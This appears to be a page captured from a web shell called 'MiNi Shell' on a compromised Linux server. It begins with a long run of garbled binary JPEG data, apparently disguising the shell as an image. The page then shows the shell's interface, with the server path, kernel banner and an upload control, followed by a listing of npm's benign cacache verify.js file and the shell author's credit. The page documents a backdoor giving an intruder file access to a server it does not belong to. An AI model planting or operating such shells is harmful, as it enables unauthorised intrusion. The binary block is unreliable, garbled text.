JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /usr/lib/node_modules/npm/node_modules/cacache/lib/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //usr/lib/node_modules/npm/node_modules/cacache/lib/verify.js

'use strict'

const util = require('util')

const pMap = require('p-map')
const contentPath = require('./content/path')
const fixOwner = require('./util/fix-owner')
const fs = require('@npmcli/fs')
const fsm = require('fs-minipass')
const glob = util.promisify(require('glob'))
const index = require('./entry-index')
const path = require('path')
const rimraf = util.promisify(require('rimraf'))
const ssri = require('ssri')

const globify = pattern => pattern.split('\\').join('/')

const hasOwnProperty = (obj, key) =>
  Object.prototype.hasOwnProperty.call(obj, key)

const verifyOpts = (opts) => ({
  concurrency: 20,
  log: { silly () {} },
  ...opts,
})

module.exports = verify

async function verify (cache, opts) {
  opts = verifyOpts(opts)
  opts.log.silly('verify', 'verifying cache at', cache)

  const steps = [
    markStartTime,
    fixPerms,
    garbageCollect,
    rebuildIndex,
    cleanTmp,
    writeVerifile,
    markEndTime,
  ]

  const stats = {}
  for (const step of steps) {
    const label = step.name
    const start = new Date()
    const s = await step(cache, opts)
    if (s) {
      Object.keys(s).forEach((k) => {
        stats[k] = s[k]
      })
    }
    const end = new Date()
    if (!stats.runTime) {
      stats.runTime = {}
    }
    stats.runTime[label] = end - start
  }
  stats.runTime.total = stats.endTime - stats.startTime
  opts.log.silly(
    'verify',
    'verification finished for',
    cache,
    'in',
    `${stats.runTime.total}ms`
  )
  return stats
}

async function markStartTime (cache, opts) {
  return { startTime: new Date() }
}

async function markEndTime (cache, opts) {
  return { endTime: new Date() }
}

async function fixPerms (cache, opts) {
  opts.log.silly('verify', 'fixing cache permissions')
  await fixOwner.mkdirfix(cache, cache)
  // TODO - fix file permissions too
  await fixOwner.chownr(cache, cache)
  return null
}

// Implements a naive mark-and-sweep tracing garbage collector.
//
// The algorithm is basically as follows:
// 1. Read (and filter) all index entries ("pointers")
// 2. Mark each integrity value as "live"
// 3. Read entire filesystem tree in `content-vX/` dir
// 4. If content is live, verify its checksum and delete it if it fails
// 5. If content is not marked as live, rimraf it.
//
async function garbageCollect (cache, opts) {
  opts.log.silly('verify', 'garbage collecting content')
  const indexStream = index.lsStream(cache)
  const liveContent = new Set()
  indexStream.on('data', (entry) => {
    if (opts.filter && !opts.filter(entry)) {
      return
    }

    liveContent.add(entry.integrity.toString())
  })
  await new Promise((resolve, reject) => {
    indexStream.on('end', resolve).on('error', reject)
  })
  const contentDir = contentPath.contentDir(cache)
  const files = await glob(globify(path.join(contentDir, '**')), {
    follow: false,
    nodir: true,
    nosort: true,
  })
  const stats = {
    verifiedContent: 0,
    reclaimedCount: 0,
    reclaimedSize: 0,
    badContentCount: 0,
    keptSize: 0,
  }
  await pMap(
    files,
    async (f) => {
      const split = f.split(/[/\\]/)
      const digest = split.slice(split.length - 3).join('')
      const algo = split[split.length - 4]
      const integrity = ssri.fromHex(digest, algo)
      if (liveContent.has(integrity.toString())) {
        const info = await verifyContent(f, integrity)
        if (!info.valid) {
          stats.reclaimedCount++
          stats.badContentCount++
          stats.reclaimedSize += info.size
        } else {
          stats.verifiedContent++
          stats.keptSize += info.size
        }
      } else {
        // No entries refer to this content. We can delete.
        stats.reclaimedCount++
        const s = await fs.stat(f)
        await rimraf(f)
        stats.reclaimedSize += s.size
      }
      return stats
    },
    { concurrency: opts.concurrency }
  )
  return stats
}

async function verifyContent (filepath, sri) {
  const contentInfo = {}
  try {
    const { size } = await fs.stat(filepath)
    contentInfo.size = size
    contentInfo.valid = true
    await ssri.checkStream(new fsm.ReadStream(filepath), sri)
  } catch (err) {
    if (err.code === 'ENOENT') {
      return { size: 0, valid: false }
    }
    if (err.code !== 'EINTEGRITY') {
      throw err
    }

    await rimraf(filepath)
    contentInfo.valid = false
  }
  return contentInfo
}

async function rebuildIndex (cache, opts) {
  opts.log.silly('verify', 'rebuilding index')
  const entries = await index.ls(cache)
  const stats = {
    missingContent: 0,
    rejectedEntries: 0,
    totalEntries: 0,
  }
  const buckets = {}
  for (const k in entries) {
    /* istanbul ignore else */
    if (hasOwnProperty(entries, k)) {
      const hashed = index.hashKey(k)
      const entry = entries[k]
      const excluded = opts.filter && !opts.filter(entry)
      excluded && stats.rejectedEntries++
      if (buckets[hashed] && !excluded) {
        buckets[hashed].push(entry)
      } else if (buckets[hashed] && excluded) {
        // skip
      } else if (excluded) {
        buckets[hashed] = []
        buckets[hashed]._path = index.bucketPath(cache, k)
      } else {
        buckets[hashed] = [entry]
        buckets[hashed]._path = index.bucketPath(cache, k)
      }
    }
  }
  await pMap(
    Object.keys(buckets),
    (key) => {
      return rebuildBucket(cache, buckets[key], stats, opts)
    },
    { concurrency: opts.concurrency }
  )
  return stats
}

async function rebuildBucket (cache, bucket, stats, opts) {
  await fs.truncate(bucket._path)
  // This needs to be serialized because cacache explicitly
  // lets very racy bucket conflicts clobber each other.
  for (const entry of bucket) {
    const content = contentPath(cache, entry.integrity)
    try {
      await fs.stat(content)
      await index.insert(cache, entry.key, entry.integrity, {
        metadata: entry.metadata,
        size: entry.size,
      })
      stats.totalEntries++
    } catch (err) {
      if (err.code === 'ENOENT') {
        stats.rejectedEntries++
        stats.missingContent++
      } else {
        throw err
      }
    }
  }
}

function cleanTmp (cache, opts) {
  opts.log.silly('verify', 'cleaning tmp directory')
  return rimraf(path.join(cache, 'tmp'))
}

function writeVerifile (cache, opts) {
  const verifile = path.join(cache, '_lastverified')
  opts.log.silly('verify', 'writing verifile to ' + verifile)
  try {
    return fs.writeFile(verifile, `${Date.now()}`)
  } finally {
    fixOwner.chownr.sync(cache, verifile)
  }
}

module.exports.lastRun = lastRun

async function lastRun (cache) {
  const data = await fs.readFile(path.join(cache, '_lastverified'), { encoding: 'utf8' })
  return new Date(+data)
}

Creat By MiNi SheLL
Email: jattceo@gmail.com